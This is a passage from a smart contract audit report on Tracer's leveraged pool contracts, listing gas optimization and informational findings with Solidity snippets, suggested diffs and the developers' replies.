Description: Given that claim() can return 0 when the claim isn't valid yet due to updateInterval, the return value should be checked to avoid doing an unnecessary sendValue() call with amount 0.

Address.sendValue(
    payable(msg.sender),
    claim(user, poolCommitterAddress, poolCommitter, currentUpdateIntervalId)
);

Recommendation: A check should be added to ensure the amount to transfer is greater than 0 before calling Address.sendValue().
Tracer: Valid, fixed in PR 382.
5.5.10 Unneeded onlyUnpaused modifier in setQuoteAndPool()
Severity: Gas Optimization
Context: PoolCommitter.sol#L776
Description: The setQuoteAndPool() function is only callable once, from the factory contract during deployment, due to the onlyFactory modifier. During this call the contract is always unpaused, therefore the onlyUnpaused modifier is not necessary.
Recommendation: The onlyUnpaused modifier should be removed.

-   function setQuoteAndPool(address _quoteToken, address _leveragedPool) external override onlyFactory onlyUnpaused {
+   function setQuoteAndPool(address _quoteToken, address _leveragedPool) external override onlyFactory {

Tracer: Valid, will fix.

5.5.11 Unnecessary mapping access in AutoClaim.makePaidClaimRequest()
Severity: Gas Optimization
Context: AutoClaim.sol#L46-L62
Description: Resolving mappings consumes more gas than directly accessing the storage struct, therefore it is more gas-efficient to use the already de-referenced variable than to resolve the mapping again.

function makePaidClaimRequest(address user) external payable override onlyPoolCommitter {
    ClaimRequest storage request = claimRequests[user][msg.sender];
    ...
    uint256 reward = claimRequests[user][msg.sender].reward;
    ...
    claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId;
    claimRequests[user][msg.sender].reward = msg.value;

Recommendation: claimRequests[user][msg.sender] should be replaced by request.

-   uint256 reward = claimRequests[user][msg.sender].reward;
+   uint256 reward = request.reward;
    ...
-   claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId;
+   request.updateIntervalId = requestUpdateIntervalId;
-   claimRequests[user][msg.sender].reward = msg.value;
+   request.reward = msg.value;

Tracer: Valid, fixed in PR 397.

5.5.12 Function complexity can be reduced from linear to constant by rewriting loops
Severity: Gas Optimization
Context: PriceObserver.sol#L71-L88, PriceObserver.sol#L130-L146, SMAOracle.sol#L110-L142
Description: The add() function of the PriceObserver contract shifts an entire array if the buffer is full, and the SMA() function of the SMAOracle contract sums the values of an array to calculate its average. Both of these functions have O(n) complexity and could be rewritten to have O(1) complexity. This would save gas and possibly allow increasing the buffer size.

contract PriceObserver is Ownable, IPriceObserver {
    ...
    * @dev If the backing array is full (i.e., `length() == capacity()`), then
    * it is rotated such that the oldest price observation is deleted
    function add(int256 x) external override onlyWriter returns (bool) {
        ...
        if (full()) {
            leftRotateWithPad(x);
        ...
    }

    function leftRotateWithPad(int256 x) private {
        uint256 n = length();
        /* linear scan over the [1, n] subsequence */
        for (uint256 i = 1; i < n; i++) {
            observations[i - 1] = observations[i];
        }
        ...
    }
}

contract SMAOracle is IOracleWrapper {
    * @dev O(k) complexity due to linear traversal of the final `k` elements of `xs`
    ...
    function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) {
        ...
        /* linear scan over the [n - k, n] subsequence */
        for (uint256 i = n - k; i < n; i++) {
            S += xs[i];
        }
        ...
    }
}

Recommendation: A circular buffer should be used, like other protocols do. This reduces the complexity of the functions to O(1). Note: This is also suggested in the Runtime Verification report: "B14 PriceObserver - potential gas optimization". Keeping the sum of the last k (periods) elements of observations should be considered. In that case, the following should be used when adding an element to the array: sum = sum + latest added element - element[buffer length - k]. Then the average of the last k elements can be calculated by dividing the sum by k. Note: this requires a tighter integration between SMAOracle and PriceObserver. A sketch of this design is given after this finding.
Tracer: We are wondering if PriceObserver is needed. The initial motivation was to support potentially multiple "thin" oracles (e.g. EMAOracle, etc.) that apply some very simple transformations to the underlying spot price observations. However:
1. It is currently unclear if this is even a product necessity.
2. It adds complexity.
The question then is: do you consider PriceObserver's existence justified? Regardless of the answer to this question, it is pretty clear that SMAOracle needs to be refactored to capture asymptotic complexity bounds.
Spearbit: Agreed, the PriceObserver is tightly coupled to its writer, which is the only contract that can decide when it is updated. There is an implicit updateInterval and token pair dependency in the PriceObserver already, which restricts reusing it to "thin oracles" that operate on the same values. Currently, we would say that the existence of PriceObserver is not justified, and it could just be an abstract contract that SMAOracle inherits. It really depends on how likely it is that there will be other "thin oracle wrappers" in the future and whether these will operate on the same tokens and update intervals. Even in that case, as the observer has only one writer, it will not work well with multiple thin oracles. This is because if two oracles use the same observer, you need to decide which one is the writer and communicate to the other that it shall not write. You may need multiple writers, but they do not know when the last update to the observer occurred, and you risk writing to it several times before the update interval has passed. So we do not think it is reusable in its current form, and it does not need to exist or be deployed on its own.
Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended, so as a result it will likely be submitted for several defects here. We would appreciate it if each defect could be assessed against it.
Spearbit: PriceObserver.sol is removed and an alternative way was found to store prices without shifting. Note: _calculateSMA() is still O(n).
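The circular buffer with a running sum can be sketched as follows; capacity and names are illustrative, not the Tracer implementation:

contract RingSMA {
    int256[24] private buf;
    uint256 private head;   // index of the next write (oldest element when full)
    uint256 private count;  // number of observations stored so far
    int256 private sum;     // running sum of the stored observations

    // O(1) insertion: no shifting, only one slot is overwritten.
    function add(int256 x) external {
        if (count == buf.length) {
            sum -= buf[head]; // drop the oldest observation from the sum
        } else {
            count++;
        }
        sum += x;
        buf[head] = x;
        head = (head + 1) % buf.length;
    }

    // O(1) average over everything currently stored.
    function sma() external view returns (int256) {
        require(count > 0, "no observations");
        return sum / int256(count);
    }
}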
5.5.13 Unused observer state variable in PoolKeeper
Severity: Gas Optimization
Context: PoolKeeper.sol#L37
Description: There is no use for the observer state variable. It is only used in performUpkeepSinglePool() in a require statement to check whether it is set.

address public observer;

function setPriceObserver(address _observer) external onlyOwner {
    ...
    observer = _observer;
    ...

function performUpkeepSinglePool(...)
    require(observer != address(0), "Observer not initialized");
    ...

Recommendation: The observer state variable should be removed, along with the setter function and the require statement in performUpkeepSinglePool().
Tracer: Valid, fixed in PR 273.

5.5.14 Usage of temporary variable instead of type casting in PoolKeeper.performUpkeepSinglePool()
Severity: Gas Optimization
Context: PoolKeeper.sol#L132
Description: The pool temporary variable is used to cast the address to ILeveragedPool. Casting the address directly where the pool variable is used saves gas, as _pool is calldata.
Recommendation: A direct typecast from _pool should be used instead of a temporary variable.

-   ILeveragedPool pool = ILeveragedPool(_pool);
    ...
-   IOracleWrapper poolOracleWrapper = IOracleWrapper(pool.oracleWrapper());
+   IOracleWrapper poolOracleWrapper = IOracleWrapper(ILeveragedPool(_pool).oracleWrapper());
    ...
-   try pool.poolUpkeep(...)
+   try ILeveragedPool(_pool).poolUpkeep(...)

Tracer: Valid, addressed in issue 365.
5.5.15 Events and event emissions can be optimized
Severity: Gas Optimization
Context: PoolCommitter.sol#L151, PoolCommitter.sol#L776-L783, PoolFactory.sol#L164
Description: Having a single DeployCommitter event emitted after setQuoteAndPool() in PoolFactory.deployPool() would result in:
1. Better UX/event tracking and alignment with the current behavior of emitting events during the factory deployment.
2. Removal of the QuoteAndPoolChanged event, which is emitted only once during the lifetime of the PoolCommitter, during PoolFactory.deployPool().
3. Removal of the ChangeIntervalSet emission in PoolCommitter.initialize(). The changeInterval has not really changed; it was initialized. This can be tracked by the DeployCommitter event.
Recommendation: A DeployCommitter event emission should be added after the setQuoteAndPool() call in PoolFactory.deployPool(). That specific event should track the parameters that need to be tracked, including the ones previously tracked by ChangeIntervalSet and QuoteAndPoolChanged.

function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) {
    ...
    // approve the quote token on the pool commiter to finalise linking
    // this also stores the pool address in the commiter
    IPoolCommitter(poolCommitterAddress).setQuoteAndPool(deploymentParameters.quoteToken, _pool);
+   emit DeployCommitter(deploymentParameters.quoteToken, _pool, changeInterval);
    ...
}

The QuoteAndPoolChanged event emission should be removed from PoolCommitter.setQuoteAndPool(), along with the _quoteToken parameter and the check on _quoteToken. This last parameter will always be different from address(0), because it was already checked in the LeveragedPool initialization.

function setQuoteAndPool(address _quoteToken, address _leveragedPool) external override onlyFactory onlyUnpaused {
-   require(_quoteToken != address(0), "Quote token address cannot be 0 address");
    require(_leveragedPool != address(0), "Leveraged pool address cannot be 0 address");
    leveragedPool = _leveragedPool;
    tokens = ILeveragedPool(leveragedPool).poolTokens();
-   emit QuoteAndPoolChanged(_quoteToken, _leveragedPool);
}

The QuoteAndPoolChanged event should be removed, as it won't be used, considering setQuoteAndPool() is only called by the factory at deploy time. The method name should be changed to initQuoteAndPool() to be more precise about its real meaning. NatSpec comments should be updated accordingly. The ChangeIntervalSet event emission should be removed from PoolCommitter.initialize().

function initialize(
    address _factory,
    address _invariantCheckContract,
    address _autoClaim,
    address _factoryOwner,
    uint256 _mintingFee,
    uint256 _burningFee,
    uint256 _changeInterval
) external override initializer {
    ...
-   emit ChangeIntervalSet(_changeInterval);
    ...
}

Tracer: Valid, addressed in PR 395.
5.5.16 Multi-paid claim rewards should be sent only if nonzero
Severity: Gas Optimization
Context: AutoClaim.sol#L122, AutoClaim.sol#L141
Description: In both multiPaidClaimMultiplePoolCommitters() and multiPaidClaimSinglePoolCommitter() there could be cases where the reward sent back to the claimer is zero. In these scenarios, the reward value should be checked to avoid wasting gas.
Recommendation: The reward should be sent back to msg.sender only if it is nonzero. The check is necessary even if the Tracer team adds a check on msg.value (PoolCommitter.sol#L312-L314), because claimers could claim nonexistent commits or commits that have already been claimed.

function multiPaidClaimMultiplePoolCommitters(address[] calldata users, address[] calldata poolCommitterAddresses) external override {
    ...
-   Address.sendValue(payable(msg.sender), reward);
+   if (reward != 0) {
+       Address.sendValue(payable(msg.sender), reward);
+   }
}

function multiPaidClaimSinglePoolCommitter(address[] calldata users, address poolCommitterAddress) external override {
    ...
-   Address.sendValue(payable(msg.sender), reward);
+   if (reward != 0) {
+       Address.sendValue(payable(msg.sender), reward);
+   }
}

Tracer: Valid, fixed in PR 382.

5.5.17 Unnecessary quad arithmetic use where integer arithmetic works
Severity: Gas Optimization
Context: PoolSwapLibrary.sol#L331, PoolKeeper.sol#L245-L261
Description: The ABDKMathQuad library is used to compute a division which is then truncated with toUInt(). Semantically this is equivalent to a standard uint division, which is more gas-efficient. The same library is also unnecessarily used to compute the keeper's reward. This can safely be done using standard uint computation.

function appropriateUpdateIntervalId(...)
    ...
    uint256 factorDifference = ABDKMathQuad.toUInt(divUInt(frontRunningInterval, updateInterval));

function keeperReward(...)
    ...
    int256 wadRewardValue = ABDKMathQuad.toInt(
        ABDKMathQuad.add(
            ABDKMathQuad.fromUInt(_keeperGas),
            ABDKMathQuad.div(
                (
                    ABDKMathQuad.div(
                        (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)),
                        ABDKMathQuad.fromUInt(100)
                    )
                ),
                FIXED_POINT
            )
        )
    );
    uint256 decimals = IERC20DecimalsWrapper(ILeveragedPool(_pool).quoteToken()).decimals();
    uint256 deWadifiedReward = PoolSwapLibrary.fromWad(uint256(wadRewardValue), decimals);

Recommendation: ABDKMathQuad should be replaced with standard uint computation where possible.
Tracer: Valid, addressed in PR 391.
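A minimal sketch of the reward in plain uint arithmetic, assuming _keeperGas is a WAD-scaled quote-token amount and _tipPercent an integer percentage (names are illustrative):

function keeperReward(uint256 _keeperGas, uint256 _tipPercent) pure returns (uint256) {
    // reward = keeperGas + keeperGas * tip%; integer division truncates,
    // matching the toUInt()/toInt() truncation of the quad version.
    return _keeperGas + (_keeperGas * _tipPercent) / 100;
}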
5.5.18 Custom errors should be used
Severity: Gas Optimization
Context: Contracts
Description: In the latest Solidity versions it is possible to replace the strings used to encode error messages with custom errors, which are more gas-efficient.

AutoClaim.sol:
    require(poolFactory.isValidPoolCommitter(msg.sender), "msg.sender not valid PoolCommitter");
    require(_poolFactoryAddress != address(0), "PoolFactory address == 0");
    require(poolFactory.isValidPoolCommitter(poolCommitterAddress), "Invalid PoolCommitter");
    require(users.length == poolCommitterAddresses.length, "Supplied arrays must be same length");
ChainlinkOracleWrapper.sol:
    require(_oracle != address(0), "Oracle cannot be 0 address");
    require(_deployer != address(0), "Deployer cannot be 0 address");
    require(_decimals <= MAX_DECIMALS, "COA: too many decimals");
    require(answeredInRound >= roundID, "COA: Stale answer");
    require(timeStamp != 0, "COA: Round incomplete");
ERC20_Cloneable.sol:
    require(msg.sender == owner, "msg.sender not owner");
    require(_owner != address(0), "Owner: setting to 0 address");
InvariantCheck.sol:
    require(_factory != address(0), "Factory address cannot be null");
    require(poolFactory.isValidPool(poolToCheck), "Pool is invalid");
LeveragedPool.sol:
    require(!paused, "Pool is paused"); (x3)
    require(msg.sender == keeper, "msg.sender not keeper");
    require(msg.sender == invariantCheckContract, "msg.sender not invariantCheckContract");
    require(msg.sender == poolCommitter, "msg.sender not poolCommitter");
    require(msg.sender == governance, "msg.sender not governance");
    require(initialization._feeAddress != address(0), "Fee address cannot be 0 address");
    require(initialization._quoteToken != address(0), "Quote token cannot be 0 address");
    require(initialization._oracleWrapper != address(0), "Oracle wrapper cannot be 0 address");
    require(initialization._settlementEthOracle != address(0), "Keeper oracle cannot be 0 address");
    require(initialization._owner != address(0), "Owner cannot be 0 address");
    require(initialization._keeper != address(0), "Keeper cannot be 0 address");
    require(initialization._longToken != address(0), "Long token cannot be 0 address");
    require(initialization._shortToken != address(0), "Short token cannot be 0 address");
    require(initialization._poolCommitter != address(0), "PoolCommitter cannot be 0 address");
    require(initialization._invariantCheckContract != address(0), "InvariantCheck cannot be 0 address");
    require(initialization._fee < PoolSwapLibrary.WAD_PRECISION, "Fee >= 100%");
    require(initialization._secondaryFeeSplitPercent <= 100, "Secondary fee split cannot exceed 100%");
    require(initialization._updateInterval != 0, "Update interval cannot be 0");
    require(intervalPassed(), "Update interval hasn't passed");
    require(account != address(0), "Account cannot be 0 address");
    require(msg.sender == _oldSecondaryFeeAddress);
    require(_keeper != address(0), "Keeper address cannot be 0 address");
    require(_governance != governance, "New governance address cannot be same as old governance address");
    require(_governance != address(0), "Governance address cannot be 0 address");
    require(governanceTransferInProgress, "No governance change active");
    require(msg.sender == _provisionalGovernance, "Not provisional governor");
    require(paused, "Pool is live");
PoolCommitter.sol:
    require(!paused, "Pool is paused"); (x3)
    require(msg.sender == governance, "msg.sender not governance");
    require(msg.sender == invariantCheckContract, "msg.sender not invariantCheckContract");
    require(msg.sender == factory, "Committer: not factory");
    require(msg.sender == leveragedPool, "msg.sender not leveragedPool");
    require(msg.sender == user || msg.sender == address(autoClaim), "msg.sender not committer or AutoClaim");
    require(_factory != address(0), "Factory address cannot be 0 address");
    require(_invariantCheckContract != address(0), "InvariantCheck address cannot be 0 address");
    require(_autoClaim != address(0), "AutoClaim address cannot be null");
    require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, "Minting fee >= 100%");
    require(_burningFee < PoolSwapLibrary.WAD_PRECISION, "Burning fee >= 100%");
    require(userCommit.balanceLongBurnAmount <= balance.longTokens, "Insufficient pool tokens");
    require(userCommit.balanceShortBurnAmount <= balance.shortTokens, "Insufficient pool tokens");
    require(userCommit.balanceLongBurnMintAmount <= balance.longTokens, "Insufficient pool tokens");
    require(userCommit.balanceShortBurnMintAmount <= balance.shortTokens, "Insufficient pool tokens");
    require(amount > 0, "Amount must not be zero");
    require(_quoteToken != address(0), "Quote token address cannot be 0 address");
    require(_leveragedPool != address(0), "Leveraged pool address cannot be 0 address");
PoolFactory.sol:
    require(_feeReceiver != address(0), "Address cannot be null");
    require(_poolKeeper != address(0), "PoolKeeper not set");
    require(autoClaim != address(0), "AutoClaim not set");
    require(invariantCheck != address(0), "InvariantCheck not set");
    require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, "Deployer must be oracle wrapper owner");
    require(deploymentParameters.leverageAmount >= 1 && deploymentParameters.leverageAmount <= maxLeverage, "PoolKeeper: leveraged amount invalid");
    require(IERC20DecimalsWrapper(deploymentParameters.quoteToken).decimals() <= MAX_DECIMALS, "Decimal precision too high");
    require(_poolKeeper != address(0), "address cannot be null");
    require(_invariantCheck != address(0), "address cannot be null");
    require(_autoClaim != address(0), "address cannot be null");
    require(newMaxLeverage > 0, "Maximum leverage must be non-zero");
    require(_feeReceiver != address(0), "address cannot be null");
    require(newFeePercent <= 100, "Secondary fee split cannot exceed 100%");
    require(_fee <= 0.1e18, "Fee cannot be > 10%");
    require(_mintingFee <= 1e18, "Fee cannot be > 100%");
    require(_burningFee <= 1e18, "Fee cannot be > 100%");
    require(_changeInterval <= 1e18, "Change interval cannot be > 100%");
PoolKeeper.sol:
    require(msg.sender == address(factory), "Caller not factory");
    require(_factory != address(0), "Factory cannot be 0 address");
    require(_observer != address(0), "Price observer cannot be 0 address");
    require(firstPrice > 0, "First price is non-positive");
    require(observer != address(0), "Observer not initialized");
PoolSwapLibrary.sol:
    require(timestamp >= lastPriceTimestamp, "timestamp in the past");
    require(price != 0, "price == 0"); (x3)
PriceObserver.sol:
    require(msg.sender == writer, "PO: Permission denied");
    require(i < length(), "PO: Out of bounds");
    require(_writer != address(0), "PO: Null address not allowed");
SMAOracle.sol:
    require(_spotOracle != address(0) && _observer != address(0) && _deployer != address(0), "SMA: Null address forbidden");
    require(_periods > 0 && _periods <= IPriceObserver(_observer).capacity(), "SMA: Out of bounds");
    require(_spotDecimals <= MAX_DECIMALS, "SMA: Decimal precision too high");
    require(_updateInterval != 0, "Update interval cannot be 0");
    require(block.timestamp >= lastUpdate + updateInterval, "SMA: Too early to update");
    require(k > 0 && k <= n && k <= uint256(type(int256).max), "SMA: Out of bounds");

Recommendation: The use of custom error messages should be considered, as explained on the Solidity Language Blog.
Tracer: Solidity currently doesn't support custom errors very well. The official advice is to convert all requires into conditionals manually, but we think this severely harms code readability for virtually no gain.
Spearbit: There is no problem leaving the code as it is.
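For reference, a minimal sketch of the conversion (Solidity >= 0.8.4; error and function names are illustrative):

error PoolPaused();

contract Example {
    bool public paused;

    function doSomething() external view {
        // Reverts with the 4-byte selector of PoolPaused() instead of an
        // ABI-encoded string, which is cheaper both to deploy and to revert with.
        if (paused) revert PoolPaused();
    }
}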
5.6 Informational

5.6.1 Different updateIntervals in SMAOracle and pools
Severity: Informational
Context: LeveragedPool, SMAOracle
Description: The updateIntervals for the pools and the SMAOracles are different. If the updateInterval of the SMAOracle is larger than the updateInterval for poolUpkeep(), then the oracle price update could happen directly after the poolUpkeep(). It is possible to perform permissionless calls to poll(). In combination with a delayed poolUpkeep(), an attacker could manipulate the timing of the SMAOracle price, because after a call to poll() it can't be called again until updateInterval has passed.

contract LeveragedPool is ILeveragedPool, Initializable, IPausable {
    function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer {
        ...
        updateInterval = initialization._updateInterval;
        ...
    }

    function poolUpkeep(...) external override onlyKeeper {
        require(intervalPassed(), "Update interval hasn't passed");
        ...
    }

    function intervalPassed() public view override returns (bool) {
        unchecked {
            return block.timestamp >= lastPriceTimestamp + updateInterval;
        }
    }
}

contract SMAOracle is IOracleWrapper {
    constructor(..., uint256 _updateInterval, ...) {
        updateInterval = _updateInterval;
    }

    function poll() external override returns (int256) {
        require(block.timestamp >= lastUpdate + updateInterval, "SMA: Too early to update");
        return update();
    }
}

Recommendation: SMAOracle's updateInterval should be shorter than poolUpkeep()'s updateInterval, but not so short as to allow SMA buffer rotations in between poolUpkeep() calls.
Tracer: We think the safest option is to enforce strict equality between the intervals: semantically they are basically the same thing, and we do not see any added value in allowing them to be separate concepts.
Spearbit: Note though that, from the pool's perspective, the oracleWrapper is specified by the deployer, and as such the pool does not have control or a guarantee over the SMAOracle's updateInterval, or over its impact on the price calculation.
Tracer: Presumably the deployer enforces this invariant, but oracle risk remains on deployers as per our threat model regardless. With this being said, we think we should try to develop a safer alternative to avoid errors due to negligence.
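The strict-equality option Tracer suggests could be enforced at initialization; the interface and names below are hypothetical:

interface IOracleWrapperWithInterval {
    function updateInterval() external view returns (uint256);
}

contract PoolInit {
    uint256 public updateInterval;

    function initialize(address oracleWrapper, uint256 _updateInterval) external {
        // Strict equality: semantically the two intervals are the same concept.
        require(
            IOracleWrapperWithInterval(oracleWrapper).updateInterval() == _updateInterval,
            "Oracle/pool updateInterval mismatch"
        );
        updateInterval = _updateInterval;
    }
}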
• The checkInvariantsBeforeFunction() modifier of mintTokens() is not called; however, poolUpkeep() calls the checkInvariantsAfterFunction() modifier, so that should not be a problem.
• Why is balancesAndSupplies used? It was already there in the previous versions. Is this to prevent stack too deep errors?
• It seems like a lot of variables are used, but that cannot be simplified further because the old and the new values are needed for most of them.
Tracer:
"There are quite a lot of changes, so it is important to have tests that verify that everything still works as expected."
Agreed. We are fairly confident that our existing tests cover the changes, e.g. this test ensures minting is still happening, this one checks for long balance being updated, etc.
"It might be useful to add the checks for 0 mints again (e.g. if (longMintAmount > 0) and if (shortMintAmount > 0))."
Agreed.
"Why is balancesAndSupplies used? It was already there in the previous versions. Is this to prevent stack too deep errors?"
Yes, that is correct. An alternative solution is to have different functions for processing long burn, long mint, etc., but we figured that would add a reasonable amount of complexity in regards to keeping track of the variables that get updated after each of these numbers is calculated.
Spearbit: Acknowledged, checks for 0 mints (e.g. if (longMintAmount > 0) and if (shortMintAmount > 0)) were added.
+5.6.3 Code in SMA() is hard to read
Severity: Informational
Context: SMAOracle.sol#L124-L142
Description: The SMA() function checks for k being smaller than or equal to uint256(type(int256).max), a value somewhat difficult to read. Additionally, the number 24 is hardcoded.
Note: This issue was also mentioned in the Runtime Verification report: B15 PriceObserver - avoid magic values

function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) {
    ...
    require(k > 0 && k <= n && k <= uint256(type(int256).max), "SMA: Out of bounds");
    ...
    for (uint256 i = n - k; i < n; i++) {
        S += xs[i];
    }
    ...
}

Recommendation: Code should be changed to:

- function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) {
+ function SMA(int256[MAX_NUM_ELEMS] memory xs, uint256 n, uint256 k) public pure returns (int256) {
      ...
-     require(k > 0 && k <= n && k <= uint256(type(int256).max), "SMA: Out of bounds");
+     require(k > 0 && k <= n && n <= MAX_NUM_ELEMS, "SMA: Out of bounds");
      ...
      for (uint256 i = n - k; i < n; i++) {
          S += xs[i];
      }
      ...
  }

Note: && n <= MAX_NUM_ELEMS could also be removed, because array boundary checks will give an error message if n is too large.
Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended, so as a result it will likely be submitted for several defects here. We would appreciate it if each defect could be assessed against it.
Spearbit: Acknowledged, readability has improved.
+5.6.4 Code is chain-dependent due to fixed block time and no support for EIP-1559
Severity: Informational
Context: PoolKeeper
Description: The PoolKeeper contract has several hardcoded assumptions about the chain on which it will be deployed. It has no support for EIP-1559 and doesn't use block.basefee. On Ethereum Mainnet the block time will change to 12 seconds with the ETH2 merge. The Secureum CARE-X report also has an entire discussion about other chains.

contract PoolKeeper is IPoolKeeper, Ownable {
    ...
    uint256 public constant BLOCK_TIME = 13; /* in seconds */
    ...
    /// Captures fixed gas overhead for performing upkeep that's unreachable
    /// by `gasleft()` due to our approach to error handling in that code
    uint256 public constant FIXED_GAS_OVERHEAD = 80195;
    ...
}

Recommendation: Code should be as generic as possible to support multiple chains and future changes. At the very least, assumptions made for different chains should be documented.
Tracer: We have decided that we will not fix this for the V2 launch, but it is something that we as a dev team hold quite a disdain for, and we plan to generalise and remove assumptions in the next version. We've added a NatSpec comment in PR 405.
Spearbit: Acknowledged.
+5.6.5 ABDKQuad-related constants defined outside PoolSwapLibrary
Severity: Informational
Context: PoolCommitter.sol#L24, PoolCommitter.sol#L31
Description: Some ABDKQuad-related constants are defined outside of the PoolSwapLibrary while others are shadowing the ones defined inside the library. As all ABDKQuad-related logic is contained in the library, it's less error prone to have all ABDKQuad-related definitions in the same file. The constant one is lowercase, while usually constants are uppercase.

contract PoolCommitter is IPoolCommitter, Initializable {
    bytes16 public constant one = 0x3fff0000000000000000000000000000;
    ...
    // Set max minting fee to 100%. This is a ABDKQuad representation of 1 * 10 ** 18
    bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000;
}

library PoolSwapLibrary {
    /// ABDKMathQuad-formatted representation of the number one
    bytes16 public constant one = 0x3fff0000000000000000000000000000;
}

Recommendation: Code should be changed to:

  contract PoolCommitter is IPoolCommitter, Initializable {
-     bytes16 public constant one = 0x3fff0000000000000000000000000000;
      ...
-     bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000;
+     bytes16 public constant MAX_MINTING_FEE = ABDK1E18;
  }

  library PoolSwapLibrary {
      /// ABDKMathQuad-formatted representation of the number one
-     bytes16 public constant one = 0x3fff0000000000000000000000000000;
+     bytes16 public constant ONE = 0x3fff0000000000000000000000000000;
+     // This is an ABDKQuad representation of 1 * 10 ** 18
+     bytes16 public constant ABDK1E18 = 0x403abc16d674ec800000000000000000;
  }

Tracer: Valid, fixed in PR 329.
+5.6.6 Lack of a state to allow withdrawal of tokens
Severity: Informational
Context: LeveragedPool.sol#L516
Description: Immediately after the invariants don't hold and the pool has been paused, Governance can withdraw the collateral (quote). It might be prudent to create a separate state besides paused, such that unpause actions can't happen anymore, to indicate withdrawal intention.
Note: the comment in withdrawQuote() is incorrect. The pool must be paused.

/**
 ...
 * @dev Pool must not be paused // comment not accurate
 ...
 */
...
function withdrawQuote() external onlyGov {
    require(paused, "Pool is live");
    IERC20 quoteERC = IERC20(quoteToken);
    uint256 balance = quoteERC.balanceOf(address(this));
    IERC20(quoteToken).safeTransfer(msg.sender, balance);
    emit QuoteWithdrawn(msg.sender, balance);
}

Recommendation: The creation of a separate state besides paused, to be able to withdraw the quote, should be considered. This new state should have its own requirements for transitioning from the pause state. The comments of withdrawQuote() should be updated.
Tracer: We have decided that we are happy with the two states as they are.
Since the pool can now only enter a paused state from invariant checking failing, we would prefer to be able to withdraw the settlement tokens without a timelock.
Spearbit: Acknowledged.
+5.6.7 Undocumented frontrunning protection
Severity: Informational
Context: PoolFactory.sol#L93-L174, PoolFactory.sol#L183-L203
Description: In the deployPool() function of the PoolFactory contract, the check IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender protects against frontrunning the deployment transaction of the pool.
This is because the poolCommitter, LeveragedPool and the pair tokens' instances are deployed at a deterministic address, calculated from the values of leverageAmount, quoteToken and oracleWrapper. An attacker cannot frontrun the pool deployment because their different msg.sender address causes the deployer() check to fail. Alternatively, the attacker would have to use a different oracleWrapper, resulting in a different pool. However, this is not obvious to a casual reader.

function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) {
    ...
    require(
        IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender,
        "Deployer must be oracle wrapper owner"
    );
    ...
    bytes32 uniquePoolHash = keccak256(
        abi.encode(
            deploymentParameters.leverageAmount,
            deploymentParameters.quoteToken,
            deploymentParameters.oracleWrapper
        )
    );
    PoolCommitter poolCommitter = PoolCommitter(
        Clones.cloneDeterministic(poolCommitterBaseAddress, uniquePoolHash)
    );
    ...
    LeveragedPool pool = LeveragedPool(Clones.cloneDeterministic(poolBaseAddress, uniquePoolHash));
    ...
}

function deployPairToken(...) internal returns (address) {
    ...
    bytes32 uniqueTokenHash = keccak256(
        abi.encode(
            deploymentParameters.leverageAmount,
            deploymentParameters.quoteToken,
            deploymentParameters.oracleWrapper,
            direction
        )
    );
    PoolToken pairToken = PoolToken(Clones.cloneDeterministic(pairTokenBaseAddress, uniqueTokenHash));
    ...
}

Recommendation: A comment should be added to the deployPool() function explaining to users how the frontrunning prevention works. Additionally, this will save time for future auditors and developers.
Tracer: Fixed by documenting frontrunning protection in PR 404.
+5.6.8 No event exists for users self-claiming commits
Severity: Informational
Context: AutoClaim.sol#L33-49
Description: There is no event emitted when a user self-claims a previous commit for themselves, in contrast to claim(), which does emit the PaidRequestExecution event.
Recommendation: A PaidRequestExecution event should be emitted.

+ emit PaidRequestExecution(user, msg.sender, request.reward);

Tracer: Valid, will address.
+5.6.9 Mixups of types and scaling factors
Severity: Informational
Context: PoolSwapLibrary.sol#L4
Description: There are a few findings that are related to mixups of types or scaling factors. The following types and scaling factors are used:
• uint (no scaling)
• uint (WAD scaling)
• ABDKMathQuad
• ABDKMathQuad (WAD scaling)
Solidity >0.8.9's user defined value types could be used to prevent mistakes. This will require several typecasts, but they don't add extra gas costs.
Recommendation: The use of user defined value types should be considered, as sketched below.
Tracer: Agreed.
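For illustration, a minimal sketch (editor's addition, not code from the Tracer codebase; the Wad and Quad names are hypothetical) of how user defined value types could separate the scaling factors listed above:

// SPDX-License-Identifier: MIT
pragma solidity >=0.8.9;

type Wad is uint256;  // uint scaled by 1e18 (WAD)
type Quad is bytes16; // raw ABDKMathQuad value

library WadMath {
    function add(Wad a, Wad b) internal pure returns (Wad) {
        // unwrap to the underlying uint256, add, then wrap back
        return Wad.wrap(Wad.unwrap(a) + Wad.unwrap(b));
    }
}

With these definitions, passing an unscaled uint256 (or a Quad) where a Wad is expected becomes a compile-time error, which is exactly the class of mixup this finding describes, and the explicit wrap/unwrap casts compile away to nothing.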
+5.6.10 Missing events for setInvariantCheck() and setAutoClaim() in PoolFactory
Severity: Informational
Context: PoolFactory.sol#L224-L227, PoolFactory.sol#L235-L238
Description: Events should be emitted for access-controlled critical functions, and functions that set protocol parameters or affect the protocol in significant ways.
Recommendation: Events should be emitted in those functions.
Tracer: Valid, fixed in issue 372.
Spearbit: Acknowledged.
+5.6.11 Terminology used for tokens and oracles is not clear and consistent across codebase
Severity: Informational
Context: PoolSwapLibrary.sol#L406-L431, PoolKeeper.sol#L276-L281
Description: Different terms are used across the codebase to address the different tokens, leading to some mixups. Assuming a pair BTC/USDC is being tracked with WETH as collateral, we think the following definitions apply:
• collateral token == quote token == settlement token == WETH
• pool token == long token + short token == long BTC/USDC + short BTC/USDC
As for the oracles:
• settlementEthOracle is the oracle for settlement in ETH (WETH/ETH)
• oracleWrapper is the oracle for BTC/USDC
